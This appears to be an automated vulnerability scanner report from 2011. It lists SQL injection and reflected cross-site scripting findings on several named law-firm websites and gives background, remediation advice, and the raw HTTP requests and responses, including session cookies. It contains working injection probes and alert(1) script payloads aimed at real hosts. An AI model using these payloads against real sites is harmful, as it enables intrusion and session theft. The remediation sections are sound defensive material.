SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /showoffice.aspx HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
Response 1 (redirected)
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:48:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=og0sit55134r4kyfq5mdkl3n; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 25
500 Internal Server Error
Request 2
GET /showoffice.aspx HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close
Response 2 (redirected)
HTTP/1.1 404 Not Found Connection: close Date: Wed, 19 Jan 2011 15:48:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=cjknstzb1jhxzoedkedo5kji; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 56279
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]...
The FUSEACTION parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the FUSEACTION parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?FUSEACTION=home.299'&pf=y HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:48:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The article_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the article_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=news.detail&article_id=9405'&site_id=286 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:49:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The emp_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emp_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=attorneys.detail&site_id=299&emp_id=377' HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:49:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The eventID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the eventID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=seminars.detail&eventID=5575'&site_id=492 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:51:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The fuseaction parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the fuseaction parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=home.285' HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:49:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The site_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the site_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=news.site&site_id=299' HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:49:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jonesdaydiversity.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbc5a'-alert(1)-'5b7885e79b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?fbc5a'-alert(1)-'5b7885e79b2=1 HTTP/1.1 Host: jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html>
<head> <title id="ctl00_htmlTitle">Jones Day Diversity</title> <link rel="stylesheet" ...[SNIP]... <![CDATA[ var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?fbc5a'-alert(1)-'5b7885e79b2=1';//]]> ...[SNIP]...
2.2. http://skaddenpractices.skadden.com/fca/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skaddenpractices.skadden.com
Path:
/fca/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f2fa"><script>alert(1)</script>7a7277b34d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fca/?6f2fa"><script>alert(1)</script>7a7277b34d3=1 HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.3. http://skaddenpractices.skadden.com/hc/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skaddenpractices.skadden.com
Path:
/hc/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6d57"><script>alert(1)</script>5968cea9b03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hc/?b6d57"><script>alert(1)</script>5968cea9b03=1 HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.4. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skaddenpractices.skadden.com
Path:
/sec/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81116"><script>alert(1)</script>ab7d185670b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sec/?81116"><script>alert(1)</script>ab7d185670b=1 HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.5. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skaddenpractices.skadden.com
Path:
/sec/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae3b"><script>alert(1)</script>cc7c0c0318c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sec/?7ae3b"><script>alert(1)</script>cc7c0c0318c=1 HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.6. http://www.arnoldporter.com/practices.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.arnoldporter.com
Path:
/practices.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e6e"><script>alert(1)</script>277857ca11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /practices.cfm?u=FinancialServices&action=view&id=476&32e6e"><script>alert(1)</script>277857ca11c=1 HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e37"><script>alert(1)</script>b1acff3e126 was submitted in the u parameter. This input was echoed as e8e37\"><script>alert(1)</script>b1acff3e126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /practices.cfm?u=FinancialServicese8e37"><script>alert(1)</script>b1acff3e126&action=view&id=476 HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
2.8. http://www.arnoldporter.com/publications.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.arnoldporter.com
Path:
/publications.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ef8"><script>alert(1)</script>f0da3e29c6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /publications.cfm?action=search&search_publication_type_id=advisory&59ef8"><script>alert(1)</script>f0da3e29c6c=1 HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
2.9. http://www.cov.com/about_the_firm/firm_history [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/about_the_firm/firm_history
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3824'-alert(1)-'1b19dddffc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about_the_firm/firm_history?b3824'-alert(1)-'1b19dddffc8=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | About the Firm | Firm History</title> <meta na ...[SNIP]... about_the_firm/firm_history/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/about_the_firm/firm_history/AboutSection.aspx?b3824'-alert(1)-'1b19dddffc8=1';//]]> ...[SNIP]...
2.10. http://www.cov.com/balancingworkandfamilylife [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/balancingworkandfamilylife
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec112'-alert(1)-'d654b8e90b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /balancingworkandfamilylife?ec112'-alert(1)-'d654b8e90b6=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.11. http://www.cov.com/bestviewed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/bestviewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18d5'-alert(1)-'b19132c4a4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bestviewed?e18d5'-alert(1)-'b19132c4a4f=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.12. http://www.cov.com/biographies [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/biographies
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3b19'-alert(1)-'10a178ca3f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /biographies?c3b19'-alert(1)-'10a178ca3f5=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.13. http://www.cov.com/diversityoverview [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/diversityoverview
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c748'-alert(1)-'750bc24037f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
